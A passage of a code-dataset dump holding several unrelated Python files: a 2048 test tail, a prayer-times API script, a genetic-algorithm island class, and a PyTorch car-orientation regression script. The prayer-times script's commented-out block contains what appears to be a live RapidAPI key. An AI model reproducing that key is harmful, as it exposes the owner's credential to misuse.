self.assertEqual(i, test)\n\n    \n\nif __name__ == '__main__':\n    
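# To rerun one case in isolation while debugging, a minimal sketch (method name taken from the tests above):\n    #   suite = unittest.TestSuite([AITest('test_play_random_move')])\n    #   unittest.TextTestRunner().run(suite)\n    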
unittest.main()\n","repo_name":"Axaxa1/2048","sub_path":"module2048/module2048/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22020916936","text":"import requests\n\n# url = \"https://aladhan.p.rapidapi.com/timingsByCity\"\n#\n# querystring = {\"country\":\"Uzbekistan\",\"city\":\"Fergana\",\"school\":\"1\"}\n#\n# headers = {\n# \t\"X-RapidAPI-Key\": \"c04aa4972bmsh1e00bfe24d579e0p1e9e3ejsn9fe4308f1431\",\n# \t\"X-RapidAPI-Host\": \"aladhan.p.rapidapi.com\"\n# }\n#\n# response = requests.request(\"GET\", url, headers=headers, params=querystring)\n#\n# print(response.text)\n\ncity = \"Toshkent\"\nurl = f\"https://islomapi.uz/api/present/day?region={city}\"\n\nr = requests.get(url).json()\nprint(r)\n","repo_name":"shamshod8052/namoz-vaqti-api","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"1757701182","text":"# Island.py\r\n# Brandon Jones, Jonathan Roberts, Josiah Wong\r\n# Homework 4\r\n\r\nimport time\r\nimport math\r\nimport random\r\nimport pickle\r\n\r\n\r\nfrom ga.parameters import Parameters\r\nfrom ga.fitness_function import FitnessFunction\r\nfrom ga.tldr import TLDR\r\nfrom ga.onemax import OneMax\r\nfrom ga.number_match import NumberMatch\r\nfrom ga.chromo import SummaryChromo, SummaryTools\r\nimport ga.hwrite as hwrite\r\nfrom tools.file_tools import fopen\r\n\r\nclass Island(object):\r\n\r\n def __init__(self, parms, file_name, tldr, r_seed, island_id=0):\r\n \"\"\" Constructor \"\"\"\r\n\r\n # Start timing the GA\r\n self.start_time = time.clock()\r\n\r\n # Get params file name\r\n self.parm_values = self.set_parameters(parms, file_name)\r\n self.run_seed = r_seed\r\n\r\n # Set up recording structures\r\n self.gen_best = []\r\n self.gen_avg = []\r\n self.run_best = []\r\n for i in range(self.parm_values.num_runs):\r\n self.gen_best.append([])\r\n self.gen_avg.append([])\r\n self.run_best.append([])\r\n\r\n # Write parameters to summary output file\r\n id_str = self.get_id_str()\r\n summary_file_name = \"../Output/\" + self.parm_values.exp_id + id_str + \"_summary.txt\"\r\n self.summary_output = open(summary_file_name, \"w\")\r\n self.parm_values.output_parameters(self.summary_output)\r\n\r\n # Set up Fitness Statistics matrix\r\n self.fitness_stats = []\r\n for i in range(2):\r\n temp = []\r\n for j in range(self.parm_values.generations):\r\n temp.append(0)\r\n \r\n self.fitness_stats.append(temp)\r\n\r\n # Set up arrays to record every generation's best/avg\r\n for i in range(self.parm_values.num_runs):\r\n for j in range(self.parm_values.generations):\r\n self.gen_best[i].append(-1)\r\n self.gen_avg[i].append(-1)\r\n \r\n # Calculate number of elites\r\n self.num_elites = int(self.parm_values.pop_size * self.parm_values.elitism_rate)\r\n if self.num_elites == 0 and self.parm_values.elitism_rate > 0:\r\n self.num_elites = 1\r\n self.elites = []\r\n for i in range(self.num_elites):\r\n self.elites.append(SummaryChromo())\r\n\r\n # Problem specific setup\r\n self.problem = tldr\r\n print(self.problem.name)\r\n \r\n # Initialize stuff\r\n self.best_of_gen_chromo = SummaryChromo()\r\n self.best_of_run_chromo = SummaryChromo()\r\n self.best_over_all_chromo = SummaryChromo()\r\n self.best_of_run_r = -1\r\n self.best_of_run_g = -1\r\n \r\n if self.parm_values.min_or_max == \"max\":\r\n self.default_best 
= 0.0\r\n self.default_worst = 999999999999999999999.0\r\n else:\r\n self.default_best = 999999999999999999999.0\r\n self.default_worst = 0.0\r\n \r\n self.best_over_all_chromo.raw_fitness = self.default_best\r\n \r\n self.r = 0\r\n \r\n \r\n #Key for codes:\r\n #0 represents uniform distribution\r\n #1 represents logarithmic uniform distribution\r\n #2 represents normal distribution \r\n def set_parameters(self, parms, file_name):\r\n \"\"\" Sets the parameters that this local GA will use \"\"\"\r\n\r\n # JR should change this method\r\n #mut_rate = Island.generate_mut_rate(1)\r\n #xover_rate = Island.generate_xover_rate(0)\r\n #pop_size = Island.generate_pop_size()\r\n \r\n # Default - just takes parms from file\r\n #return Parameters(file_name)\r\n \r\n return parms\r\n \r\n \r\n def get_id_str(self):\r\n \"\"\" Returns a string that uniquely identifies this island \"\"\"\r\n ret_str = \"\"\r\n ret_str += \"_r\" + str(self.run_seed) + \"_\"\r\n ret_str += \"m0.\" + str(int(100*self.parm_values.mutation_rate)) + \"_\"\r\n ret_str += \"x0.\" + str(int(100*self.parm_values.xover_rate)) + \"_\"\r\n ret_str += \"p\" + str(int(self.parm_values.pop_size)) + \"_\"\r\n ret_str += \"s0.\" + str(int(100*self.parm_values.sparsity)) + \"_\"\r\n return ret_str\r\n \r\n def start_run(self):\r\n \"\"\" Initializes stuff to begin a run \"\"\"\r\n \r\n self.r += 1 \r\n \r\n self.best_of_run_chromo.raw_fitness = self.default_best\r\n \r\n # Initialize first generation\r\n self.member = []\r\n self.child = []\r\n for i in range(self.parm_values.pop_size):\r\n self.member.append(SummaryChromo())\r\n self.child.append(SummaryChromo())\r\n \r\n self.g = -1\r\n \r\n \r\n def get_best_of_gen(self):\r\n \"\"\" Returns best elite to migrate to other islands \"\"\" \r\n return self.best_of_gen_chromo \r\n \r\n \r\n def run_next_generation(self, migrants=[]):\r\n \"\"\" Executes one generation of local GA \"\"\"\r\n \r\n self.g += 1\r\n \r\n self.sum_pro_fitness = 0\r\n self.sum_scl_fitness = 0\r\n self.sum_raw_fitness = 0\r\n self.sum_raw_fitness2 = 0\r\n self.best_of_gen_chromo.raw_fitness = self.default_best\r\n\r\n for m in range(len(migrants)):\r\n worst_of_gen_chromo = self.member[0] \r\n for i in range(self.parm_values.pop_size):\r\n if i > 0:\r\n if self.parm_values.min_or_max == \"max\":\r\n if self.member[i].raw_fitness < worst_of_gen_chromo.raw_fitness:\r\n worst_of_gen_chromo = self.member[i]\r\n elif self.parm_values.min_or_max == \"min\":\r\n if self.member[i].raw_fitness > worst_of_gen_chromo.raw_fitness:\r\n worst_of_gen_chromo = self.member[i]\r\n\r\n self.member.remove(worst_of_gen_chromo)\r\n self.member.append(migrants[m])\r\n\r\n # Test fitness of each member\r\n for i in range(self.parm_values.pop_size):\r\n\r\n # BJ: If a member changed, it's fitness would be set to -1;\r\n # don't re-evaluate members that haven't changed.\r\n# self.member[i]._reset_fitness()\r\n\r\n if (self.member[i].raw_fitness == -1):\r\n # BJ: Test time...\r\n t0 = time.time()\r\n self.problem.do_raw_fitness(self.member[i])\r\n t1 = time.time()\r\n# print(t1-t0) # Print time fitness evaluation took\r\n\r\n self.sum_raw_fitness += self.member[i].raw_fitness\r\n self.sum_raw_fitness2 += self.member[i].raw_fitness * self.member[i].raw_fitness\r\n\r\n # Update best chromosomes\r\n if self.parm_values.min_or_max == \"max\":\r\n if self.member[i].raw_fitness > self.best_of_gen_chromo.raw_fitness:\r\n SummaryChromo.copy_b2a(self.best_of_gen_chromo, self.member[i])\r\n self.best_of_gen_r = self.r\r\n self.best_of_gen_g = 
self.g\r\n if self.member[i].raw_fitness > self.best_of_run_chromo.raw_fitness:\r\n SummaryChromo.copy_b2a(self.best_of_run_chromo, self.member[i])\r\n self.best_of_run_r = self.r\r\n self.best_of_run_g = self.g\r\n if self.member[i].raw_fitness > self.best_over_all_chromo.raw_fitness:\r\n SummaryChromo.copy_b2a(self.best_over_all_chromo, self.member[i])\r\n self.best_over_all_r = self.r\r\n self.best_over_all_g = self.g \r\n else:\r\n if self.member[i].raw_fitness < self.best_of_gen_chromo.raw_fitness:\r\n SummaryChromo.copy_b2a(self.best_of_gen_chromo, self.member[i])\r\n self.best_of_gen_r = self.r\r\n self.best_of_gen_g = self.g\r\n if self.member[i].raw_fitness < self.best_of_run_chromo.raw_fitness:\r\n SummaryChromo.copy_b2a(self.best_of_run_chromo, self.member[i])\r\n self.best_of_run_r = self.r\r\n self.best_of_run_g = self.g\r\n if self.member[i].raw_fitness < self.best_over_all_chromo.raw_fitness:\r\n SummaryChromo.copy_b2a(self.best_over_all_chromo, self.member[i])\r\n self.best_over_all_r = self.r\r\n self.best_over_all_g = self.g\r\n \r\n # Accumulate fitness statistics\r\n self.fitness_stats[0][self.g] += self.sum_raw_fitness / self.parm_values.pop_size\r\n self.fitness_stats[1][self.g] += self.best_of_gen_chromo.raw_fitness\r\n \r\n self.average_raw_fitness = self.sum_raw_fitness / self.parm_values.pop_size\r\n self.stddev_raw_fitness = math.sqrt(math.fabs(self.sum_raw_fitness2 - self.sum_raw_fitness*self.sum_raw_fitness/self.parm_values.pop_size)/(self.parm_values.pop_size-1))\r\n \r\n print(str(self.r) + \"\\t\" + str(self.g) + \"\\t\" + str(self.best_of_gen_chromo.raw_fitness) + \"\\t\" + str(self.average_raw_fitness) + \"\\t\" + str(self.stddev_raw_fitness))\r\n \r\n # Output generation statistics to summary file\r\n self.summary_output.write(\" R \")\r\n hwrite.right(self.r, 3, self.summary_output)\r\n self.summary_output.write(\" G \")\r\n hwrite.right(self.g, 3, self.summary_output)\r\n hwrite.right_places(float(self.best_of_gen_chromo.raw_fitness), 11, 4, self.summary_output)\r\n hwrite.right_places(self.average_raw_fitness, 11, 4, self.summary_output)\r\n hwrite.right_places(self.stddev_raw_fitness, 11, 4, self.summary_output)\r\n self.summary_output.write(\"\\n\")\r\n \r\n \r\n \"\"\" SCALE FITNESS OF EACH MEMBER AND SUM \"\"\"\r\n \r\n if self.parm_values.scale_type == 0: # No change\r\n for i in range(self.parm_values.pop_size):\r\n self.member[i].scl_fitness = self.member[i].raw_fitness + 0.000001\r\n self.sum_scl_fitness += self.member[i].scl_fitness\r\n \r\n elif self.parm_values.scale_type == 1: # Invert fitness\r\n for i in range(self.parm_values.pop_size):\r\n self.member[i].scl_fitness = 1 / (self.member[i].raw_fitness + 0.000001)\r\n self.sum_scl_fitness += self.member[i].scl_fitness\r\n \r\n elif self.parm_values.scale_type == 2: # Scale by rank (max fitness)\r\n \r\n # Copy genetic data to temp array\r\n for i in range(self.parm_values.pop_size):\r\n self.member_index[i] = i\r\n self.member_fitness[i] = self.member[i].raw_fitness\r\n \r\n # Bubble sort the array by floating point number\r\n for i in range(self.parm_values.pop_size-1, 0, -1):\r\n for j in range(0, i):\r\n if self.member_fitness[j] > self.member_fitness[j+1]:\r\n self.t_member_index = self.member_index[j]\r\n self.t_member_fitness = self.member_fitness[j]\r\n self.member_index[j] = self.member_index[j+1]\r\n self.member_fitness[j] = self.member_fitness[j+1]\r\n self.member_index[j+1] = self.t_member_index\r\n self.member_fitness[j+1] = self.t_member_fitness\r\n \r\n # Copy ordered array 
to scale fitness fields\r\n            for i in range(self.parm_values.pop_size):\r\n                self.member[self.member_index[i]].scl_fitness = i\r\n                self.sum_scl_fitness += self.member[self.member_index[i]].scl_fitness\r\n        \r\n        elif self.parm_values.scale_type == 3: # Scale by rank (min fitness)\r\n            \r\n            # Copy genetic data to temp array\r\n            for i in range(self.parm_values.pop_size):\r\n                self.member_index[i] = i\r\n                self.member_fitness[i] = self.member[i].raw_fitness\r\n            \r\n            # Bubble sort the array by floating point number\r\n            for i in range(1, self.parm_values.pop_size):\r\n                for j in range(self.parm_values.pop_size-1, i-1, -1):\r\n                    if self.member_fitness[j-1] < self.member_fitness[j]:\r\n                        self.t_member_index = self.member_index[j-1]\r\n                        self.t_member_fitness = self.member_fitness[j-1]\r\n                        self.member_index[j-1] = self.member_index[j]\r\n                        self.member_fitness[j-1] = self.member_fitness[j]\r\n                        self.member_index[j] = self.t_member_index\r\n                        self.member_fitness[j] = self.t_member_fitness\r\n            \r\n            # Copy ordered array to scale fitness fields\r\n            for i in range(self.parm_values.pop_size):\r\n                self.member[self.member_index[i]].scl_fitness = i\r\n                self.sum_scl_fitness += self.member[self.member_index[i]].scl_fitness\r\n        \r\n        else:\r\n            print(\"ERROR - No scaling method selected\")\r\n        \r\n        \r\n        \"\"\" PROPORTIONALIZE SCALED FITNESS FOR EACH MEMBER AND SUM \"\"\"\r\n        \r\n        for i in range(self.parm_values.pop_size):\r\n            self.member[i].pro_fitness = self.member[i].scl_fitness / self.sum_scl_fitness\r\n            self.sum_pro_fitness += self.member[i].pro_fitness\r\n\r\n\r\n        \"\"\" CROSSOVER AND CREATE NEXT GENERATION \"\"\"\r\n\r\n        parent1 = -1\r\n        parent2 = -1\r\n\r\n        # Save the elites\r\n        self.member.sort(key=lambda M: M.raw_fitness)\r\n#        self.sort_members()\r\n        self.get_elites()\r\n        \r\n        # Assume always two offspring per mating\r\n        for i in range(0, self.parm_values.pop_size, 2):\r\n            \r\n            # Leave room for the elites\r\n            if (i + self.num_elites) >= self.parm_values.pop_size:\r\n                break\r\n            \r\n            # Select two parents\r\n            parent1 = SummaryChromo.select_parent(self.member, self.parm_values)\r\n            parent2 = SummaryChromo.select_parent(self.member, self.parm_values)\r\n            while parent2 == parent1:\r\n                parent2 = SummaryChromo.select_parent(self.member, self.parm_values)\r\n\r\n            # Crossover two parents to create two children\r\n            randnum = random.random()\r\n            if randnum < self.parm_values.xover_rate:\r\n                SummaryChromo.mate_parents(self.member[parent1], self.member[parent2], self.child[i], self.child[i+1])\r\n            else:\r\n                SummaryChromo.clone(parent1, self.member[parent1], self.child[i])\r\n                SummaryChromo.clone(parent2, self.member[parent2], self.child[i+1])\r\n\r\n        # Mutate children (draw a fresh random number for each child)\r\n        for i in range(self.parm_values.pop_size):\r\n            randnum = random.random()\r\n            if randnum < self.parm_values.mutation_rate:\r\n                self.child[i].do_mutation()\r\n        \r\n        # Swap children with last generation\r\n        for i in range(self.parm_values.pop_size):\r\n            SummaryChromo.copy_b2a(self.member[i], self.child[i])\r\n\r\n        # Add the elites back in\r\n        if self.g == self.parm_values.generations-1:\r\n            self.insert_elites(True)\r\n        else:\r\n            self.insert_elites(False)\r\n        \r\n        \r\n    def finish_run(self):\r\n        \"\"\" Wraps up stuff to finish a run \"\"\"\r\n        \r\n        hwrite.left(self.best_of_run_r, 4, self.summary_output)\r\n        hwrite.right(self.best_of_run_g, 4, self.summary_output)\r\n        self.problem.do_print_genes(self.best_of_run_chromo, self.summary_output)\r\n        print(str(self.r) + \"\\t\" + \"B\" + \"\\t\" + str(float(self.best_of_run_chromo.raw_fitness)))\r\n        print()        \r\n        \r\n        # Pickle best 
Chromo\r\n        f_name = (\"../Output/Best Chromos/chromo\" +\r\n                  \"-f\" + str(self.best_of_gen_chromo.raw_fitness) +\r\n                  \"-p\" + str(self.parm_values.pop_size) +\r\n                  \"-m\" + str(self.parm_values.mutation_rate) +\r\n                  \"-x\" + str(self.parm_values.xover_rate) +\r\n                  \".p\")\r\n        with open(f_name, \"wb\") as fp:\r\n            pickle.dump(self.best_of_gen_chromo, fp, protocol=2)\r\n    \r\n    def shut_down(self):\r\n        \"\"\" Code for when this local GA is done with all runs \"\"\"\r\n\r\n        # Output fitness statistics matrix\r\n        self.summary_output.write(\"Gen | AvgFit | StdDev-Avg | BestFit | StdDev-Best\\n\")\r\n\r\n        for i in range(self.parm_values.generations):\r\n            hwrite.left(i, 15, self.summary_output)\r\n\r\n            # Print avg of avg\r\n            hwrite.left_places(self.fitness_stats[0][i]/self.parm_values.num_runs, 20, 4, self.summary_output)\r\n\r\n            # Print std dev of avg of avg\r\n            stddev_avg = 0\r\n            avg_avg = self.fitness_stats[0][i]/self.parm_values.num_runs\r\n            for r in range(self.parm_values.num_runs):\r\n                stddev_avg += (self.gen_avg[r][i] - avg_avg) * (self.gen_avg[r][i] - avg_avg)\r\n            stddev_avg = math.sqrt(stddev_avg / (self.parm_values.num_runs-1))\r\n            hwrite.left_places(stddev_avg, 20, 4, self.summary_output)\r\n\r\n            # Print avg of best\r\n            hwrite.left_places(self.fitness_stats[1][i] / self.parm_values.num_runs, 20, 4, self.summary_output)\r\n\r\n            # Print std dev of avg of best\r\n            stddev_best = 0\r\n            avg_best = self.fitness_stats[1][i] / self.parm_values.num_runs\r\n            for r in range(self.parm_values.num_runs):\r\n                stddev_best += (self.gen_best[r][i] - avg_best) * (self.gen_best[r][i] - avg_best)\r\n            stddev_best = math.sqrt(stddev_best / self.parm_values.num_runs)\r\n            hwrite.left_places(stddev_best, 20, 4, self.summary_output)\r\n            \r\n            self.summary_output.write(\"\\n\")\r\n        \r\n        self.summary_output.write(\"\\n\")\r\n        self.summary_output.close()\r\n        \r\n        print()\r\n        print(\"Start: \" + str(self.start_time))\r\n        end_time = time.clock()\r\n        print(\"End: \" + str(end_time))\r\n        \r\n    \"\"\" ELITISM CODE \"\"\"\r\n    \r\n    \r\n    def swap(self, i, j):\r\n        \"\"\" Swaps contents of two SummaryChromo instances \"\"\" \r\n\r\n        temp = SummaryChromo()\r\n        SummaryChromo.copy_b2a(temp, self.member[i])\r\n        SummaryChromo.copy_b2a(self.member[i], self.member[j])\r\n        SummaryChromo.copy_b2a(self.member[j], temp)\r\n\r\n    def get_elites(self):\r\n        \"\"\" Copies best individuals to elites list \"\"\"\r\n\r\n        if self.parm_values.min_or_max == \"min\":\r\n            for i in range(self.num_elites):\r\n                SummaryChromo.copy_b2a(self.elites[i], self.member[i])\r\n\r\n        elif self.parm_values.min_or_max == \"max\":\r\n            for i in range(self.num_elites):\r\n                SummaryChromo.copy_b2a(self.elites[i], self.member[self.parm_values.pop_size-i-1])\r\n\r\n    def insert_elites(self, do_print):\r\n        \"\"\" Adds unaltered elites back into the population \"\"\"\r\n\r\n        if do_print:\r\n            print(\"Elites:\")\r\n            for i in range(self.num_elites):\r\n                print(str(self.elites[i].raw_fitness) + \" \" + str(self.elites[i].fit_dict))\r\n        \r\n        for i in range(self.num_elites):\r\n            SummaryChromo.copy_b2a(self.member[self.parm_values.pop_size-i-1], self.elites[i])\r\n","repo_name":"bwj-GitHub/CAP-5512-Summarization-GA","sub_path":"ga/island.py","file_name":"island.py","file_ext":"py","file_size_in_byte":19347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16282584835","text":"# -*- coding: utf-8 -*-\nimport os\nimport io\nimport struct\nimport random\nimport glob\nimport csv\nimport time\n\nimport numpy as np\nimport 
cv2\nimport sys\n\nimport torch\nfrom torch import nn\nfrom torchvision import transforms\nfrom torch import optim\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport matplotlib.ticker as ticker\nfrom PIL import Image\n\n# variable definitions\n#5\n#TESTDATASET_DIR_IMG = '../datasets/CompCars-origin/data/image/**/**/**/'\n#TESTDATASET_DIR_LBL = '../datasets/CompCars-origin/data/label/**/**/**/'\n#8\nTESTDATASET_DIR_IMG = '../datasets/CompCars/data/image/**/**/**/'\nTESTDATASET_DIR_LBL = '../datasets/CompCars/data/label/**/**/**/'\nIMG_TESTDATASET_PATH_IMG = sorted(glob.glob('{}*.jpg'.format(TESTDATASET_DIR_IMG)))\nIMG_TESTDATASET_PATH_LBL = sorted(glob.glob('{}*.txt'.format(TESTDATASET_DIR_LBL)))\n\nnumber_of_label = 8\nnumber_of_img = 10000\n#MODEL_PATH = '../voe/model/model-{}label.pt'.format(number_of_label)\nMODEL_PATH = '../voe/model/model-test-8-1206.pt'\n#MODEL_PATH = '../voe/model/model-3ch.pt'\n\n\nimg_width = 113\nimg_height = 113\nINPUT_FEATURES = number_of_label+1\nMIDDLE_LAYER = 6\nMIDDLE_LAYER2 = 3\nOUTPUT_FEATURES = 1\n\ndef available_cuda():\n    return 'cuda:0' if torch.cuda.is_available() else 'cpu'\n\ndevice = torch.device(available_cuda())\n\nclass I_module(nn.Module):\n    def __init__(self, in_dim: int, h_dim: int, out_dim: int):\n        super(I_module, self).__init__()\n        self.branch1 = nn.Sequential(\n            nn.Conv2d(in_dim, h_dim, kernel_size=1),\n            nn.ReLU(inplace=True),\n            nn.Conv2d(h_dim, out_dim, kernel_size=3, padding=1),\n            nn.ReLU(inplace=True)\n        )\n        self.branch2 = nn.Sequential(\n            nn.MaxPool2d(kernel_size=1),\n            nn.Conv2d(in_dim, out_dim, kernel_size=1),\n            nn.ReLU(inplace=True)\n        )\n    def forward(self, x: torch.Tensor) -> torch.Tensor:\n        branch1 = self.branch1(x)\n        branch2 = self.branch2(x)\n        return torch.cat([branch1, branch2], 1)\n\nclass F_module(nn.Module):\n    def __init__(self, in_dim: int, out_dim: int):\n        super(F_module, self).__init__()\n        self.linear1 = nn.Sequential(\n            nn.Conv2d(in_dim, out_dim, kernel_size=1),\n            nn.ReLU(inplace=True),\n            nn.Conv2d(out_dim, out_dim, kernel_size=3),\n            nn.ReLU(inplace=True)\n        )\n    def forward(self, x: torch.Tensor) -> torch.Tensor:\n        x = self.linear1(x)\n        return x\n\nclass VoNet(nn.Module):\n    def __init__(self):\n        super(VoNet, self).__init__()\n        self.features = nn.Sequential(\n            nn.Conv2d(3, 64, kernel_size=3, stride=2),\n            nn.ReLU(inplace=True),\n            nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True),\n            I_module(in_dim=64, h_dim=96, out_dim=128),\n            nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True),\n            F_module(256, 256),\n            F_module(256, 384),\n            nn.MaxPool2d(kernel_size=3, stride=2, ceil_mode=True),\n            F_module(384, 384),\n            F_module(384, 512),\n        )\n        self.classifier = nn.Sequential(\n            nn.Dropout2d(p=0.25),\n            nn.Conv2d(512, 1000, kernel_size=1),\n            nn.ReLU(inplace=True),\n            nn.AdaptiveAvgPool2d((1,1))\n        )\n    def forward(self, x: torch.Tensor) -> torch.Tensor:\n        x = self.features(x)\n        x = self.classifier(x)\n        return torch.flatten(x, 1)\n\n#-------------------------------------------------------------------------#\n\ndef plot(losses):\n    # graph drawing starts here-------------------------------------------------\n    # set the font type and size here if needed.\n    \"\"\" Draw the loss curve and export it as png and svg \"\"\"\n    it = range(1, len(losses)+1)\n    plt.plot(it, losses, label='Training loss')\n    plt.xlabel('iter')\n    plt.ylabel('Losses')\n    plt.ylim(17.0, 50.0)\n    plt.gca().xaxis.set_major_locator(ticker.MultipleLocator(100000)) # set the tick interval on the iter axis\n    # plt.legend()\n    plt.savefig('loss(8lbl).svg')\n    plt.savefig('loss(8lbl).png')\n    plt.show()\n\n# 3-layer fully-connected neural network\nclass NeuralNet(nn.Module):\n    def __init__(self, 
in_features, hidden_size1, hidden_size2, out_features):\n        super(NeuralNet, self).__init__()\n        self.fc1 = nn.Linear(in_features, hidden_size1) \n        self.relu = nn.ReLU()\n        self.fc2 = nn.Linear(hidden_size1, hidden_size2) \n        self.relu = nn.ReLU()\n        self.fc3 = nn.Linear(hidden_size2, out_features) \n\n    \n    def forward(self, x):\n        out = self.fc1(x)\n        out = self.relu(out)\n        out = self.fc2(out)\n        out = self.relu(out)\n        out = self.fc3(out)\n        return out\n\n\ndef sort_node(input):\n    if number_of_label == int(8):\n        tmp1 = input[0][4]\n        input[0][4] = input[0][3]\n        input[0][3] = input[0][1]\n        input[0][1] = tmp1\n        tmp2 = input[0][5]\n        input[0][5] = input[0][6]\n        input[0][6] = input[0][7]\n        input[0][7] = tmp2\n        #print(\"sorted_node[8label]\")\n    else:\n        tmp = input[0][3]\n        input[0][3] = input[0][1]\n        input[0][1] = input[0][4]\n        input[0][4] = tmp\n        #print(\"sorted_node[5label]\")\n    return input\n\nif __name__ == \"__main__\":\n    model = VoNet()\n    model.to(device)\n    \n    # load the trained model\n    model.load_state_dict(torch.load(MODEL_PATH))\n    # define the transform (resize the image and convert it to a tensor)\n    transform = transforms.Compose([\n        transforms.Resize((img_width, img_height)),\n        transforms.ToTensor()\n    ])\n    # define the transform (convert to a tensor only)\n    transform_array = transforms.Compose([\n        transforms.ToTensor()\n    ])\n    \n    #print(len(IMG_TESTDATASET_PATH_IMG))\n    #test_array = []\n    second_input = []\n    label_val = []\n\n    # build the dataset for the linear regression stage\n    #for n in range(len(IMG_TESTDATASET_PATH_IMG)):\n    for n in range(number_of_img):\n        IMG_PATH = IMG_TESTDATASET_PATH_IMG[n]\n        img = mpimg.imread(IMG_PATH)\n        #imgplot = plt.imshow(img)\n        #plt.show()\n        image = Image.fromarray(img)\n        image = transform(image).unsqueeze(0).to(device)\n        ## get the VoNet output, which is the input to the linear regression, into output\n        output = model(image)\n        _, pred = torch.max(output, 1)\n        z = np.int64(pred[0].item())\n        #print('predicted label (argmax) of image [%4d]: %1d.' % (n, z))\n        #print('ground-truth label (argmax) of image [%4d]: %1d.' 
% (n, ))\n        # convert to a numpy ndarray and delete the unneeded elements\n        d = output.device\n        output_numpy = output.to('cpu').detach().numpy().copy()\n        #output_numpy = np.delete(output_numpy,np.s_[number_of_label::],1)\n        output_numpy = np.delete(output_numpy,np.s_[number_of_label+1::],1)\n        output_numpy = np.delete(output_numpy,0,1)\n        # reorder the elements (unclear whether this matters)\n        output_numpy = sort_node(output_numpy)\n        second_input.append(output_numpy.tolist()) # sort_node was already applied above; applying it twice would scramble the order\n        # load the ground-truth angle data (label)\n        with open(IMG_TESTDATASET_PATH_LBL[n]) as f:\n            data = f.readlines()[1]\n            label_val.append(data)\n            #print(\"loaded ground-truth angle:\",label_val[n])\n    # check the data\n    #conf = 6\n    #print(\"path of image {}: {}\".format(conf,IMG_TESTDATASET_PATH_IMG[conf]))\n    #print(\"path of label {}: {}\".format(conf,IMG_TESTDATASET_PATH_LBL[conf]))\n    #print(\"ground-truth angle of label {}: {}\".format(conf,label_val[conf]))\n\n    #sys.exit()\n    # convert the lists to ndarrays\n    second_input = np.array(second_input)\n    label_val = np.array(label_val)\n    # convert to tensors\n    second_input = torch.tensor(second_input.astype(np.float32)).clone()\n    second_input = second_input.to(device)\n    second_input1 = torch.reshape(second_input, (-1, number_of_label))\n\n    label_val = torch.tensor(label_val.astype(np.float32)).clone()\n    label_val = label_val.to(device)\n    label_val = torch.reshape(label_val,(-1, 1))\n\n    x = torch.reshape(torch.ones(number_of_img),(-1,1))\n    x = x.to(device)\n    \n    # when using 8 labels\n    if(number_of_label == 8):\n        second_input = torch.cat((x, second_input1), 1) \n    else:\n        # when using 5 labels\n        #print(\"xsize:\",x)\n        #print(\"second:\",second_input)\n        second_input = torch.cat((x, second_input1), 1) \n    \n    # feed into the fully-connected layers (training)\n    #linear_regression_train(second_input,label_val)\n    y = label_val\n\n    model = NeuralNet(INPUT_FEATURES, MIDDLE_LAYER, MIDDLE_LAYER2, OUTPUT_FEATURES)\n    model.to(device)\n    model.train()\n    criterion = nn.L1Loss() \n    opt = optim.SGD(model.parameters(), lr=0.005) \n    niter = 150000 * 2 # number of iterations\n    losses = []\n    for i in range(niter):\n        # fetch the batch data \n        opt.zero_grad() \n        outputs = model(second_input)\n        loss = criterion(outputs.reshape(y.shape), y)\n        print(\"loss:\",loss.item())\n        # update gradients via backpropagation\n        loss.backward()\n        opt.step()\n        losses.append(loss.item()) # accumulate the loss values\n    print(\"weights:\", list(model.parameters()))\n    plot(losses)\n    \n\n\n#--------------------------------------------------\n\"\"\"\ndef linear_regression_train(x, y):\n    model_linear_detection = nn.Linear(INPUT_FEATURES, MIDDLE_LAYER, bias = True)\n    model_linear_detection1 = nn.Linear(MIDDLE_LAYER, OUTPUT_FEATURES, bias = True)\n\n    model_linear_detection.to(device)\n    model_linear_detection1.to(device)\n    opt = optim.SGD(model_linear_detection.parameters(), lr=0.03) \n    opt1 = optim.SGD(model_linear_detection1.parameters(), lr=0.03) \n    criterion = nn.L1Loss() \n    #criterion = nn.MSELoss() \n\n    niter = 150000 # number of iterations\n    losses = []\n    for i in range(niter):\n        # fetch the batch data \n        opt.zero_grad() \n        opt1.zero_grad() \n        outputs = model_linear_detection(x)\n        outputs = nn.functional.relu(outputs)\n        outputs = model_linear_detection1(outputs)\n        #print(\"out:\",outputs.data[0])\n        #print(\"label:\",y.data[0])\n        #print(\"reshapedout:\",outputs.reshape(y.shape))\n        loss = criterion(outputs.reshape(y.shape), y)\n        print(\"loss:\",loss.item())\n        # update gradients via backpropagation\n        loss.backward()\n        opt.step()\n        opt1.step()\n        losses.append(loss.item()) # accumulate the loss values\n        #print(\"layer 1\",list(model_linear_detection1.parameters()))\n        #print(\"layer 2\",list(model_linear_detection2.parameters()))\n    print(\"layer 1\",list(model_linear_detection.parameters()))\n    print(\"layer 2\",list(model_linear_detection1.parameters()))\n    
print(\"loss:\",loss.item())\n    #print(\"weight 1:\",model_linear_detection1.bias.to('cpu').detach().data.numpy().copy()[0])\n    #print(\"weight 2:\",model_linear_detection2.bias.to('cpu').detach().data.numpy().copy()[0])\n    #b = model_linear_detection.bias.to('cpu').detach().data.numpy().copy()[0]\n    #b = model_linear_detection.weight.to('cpu').detach().data.numpy()[0, 0].copy()\n    #w1 = model_linear_detection.weight.to('cpu').detach().data.numpy()[0, 1].copy()\n    #w2 = model_linear_detection.weight.to('cpu').detach().data.numpy()[0, 2].copy()\n    #w3 = model_linear_detection.weight.to('cpu').detach().data.numpy()[0, 3].copy()\n    #w4 = model_linear_detection.weight.to('cpu').detach().data.numpy()[0, 4].copy()\n    #w5 = model_linear_detection.weight.to('cpu').detach().data.numpy()[0, 5].copy()\n    #w6 = model_linear_detection.weight.to('cpu').detach().data.numpy()[0, 6].copy()\n    #w7 = model_linear_detection.weight.to('cpu').detach().data.numpy()[0, 7].copy()\n    #w8 = model_linear_detection.weight.to('cpu').detach().data.numpy()[0, 8].copy()\n    #x_new = np.linspace(np.min(x.T[1].data.to('cpu').detach().numpy().copy()), np.max(x.T[1].data.to('cpu').detach().numpy().copy()), 